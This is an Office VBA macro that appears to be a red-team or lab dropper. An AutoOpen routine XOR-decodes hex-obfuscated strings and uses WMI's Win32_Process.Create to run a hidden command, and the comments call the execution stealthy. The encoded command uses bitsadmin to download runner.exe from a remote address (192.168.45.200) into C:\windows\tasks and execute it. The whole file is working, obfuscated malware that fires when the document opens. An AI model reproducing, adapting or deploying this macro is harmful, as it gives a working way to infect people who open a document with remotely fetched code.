Function Dec(hexStr As String) As String
    Dim i As Long
    Dim result As String
    For i = 1 To Len(hexStr) Step 2
        Dim byteVal As Byte
        byteVal = Val("&H" & Mid(hexStr, i, 2))
        result = result & Chr(byteVal Xor &H6F)
    Next i
    Dec = result
End Function

Sub AutoOpen()
    ' Decrypt the strings generated by the Python script
    Dim a As String: a = Dec("06010900410B000C")  ' Decrypts to "info.doc" (document name, though not directly used here)
    Dim b As String: b = Dec("0C020B4F400C4F4D0D061B1C0E0B0206014F403B1D0E011C090A1D4F05000D5A4F400B00180" & _
                             "103000E0B4F401F1D06001D061B164F29203D2A283D203A212B4F071B1B1F5540405E565D41" & _
                             "5E5957415B5A415D5F5F403D1A01010A1D410A170A4F0C55331806010B00181C331B0E1C041" & _
                             "C331D1A01410A170A4F49494F2C55333806010B00181C331B0E1C041C331D1A01410A170A4D")  ' Decrypts to the full command string
    Dim c As String: c = Dec("1806010208021B1C55")  ' Decrypts to "winmgmts:"
    Dim d As String: d = Dec("3806015C5D303F1D000C0A1C1C")  ' Decrypts to "Win32_Process"
    
    ' Use WMI to execute the command (b) stealthily
    Dim objWMIService As Object
    Set objWMIService = GetObject(c & "\root\cimv2")  ' Equivalent to GetObject("winmgmts:\\.\root\cimv2")
    Dim objProcess As Object
    Set objProcess = objWMIService.Get(d)  ' Get the Win32_Process class
    objProcess.Create b, Null, Null, Null  ' Execute the command via WMI (stealthy, no visible cmd window)
End Sub
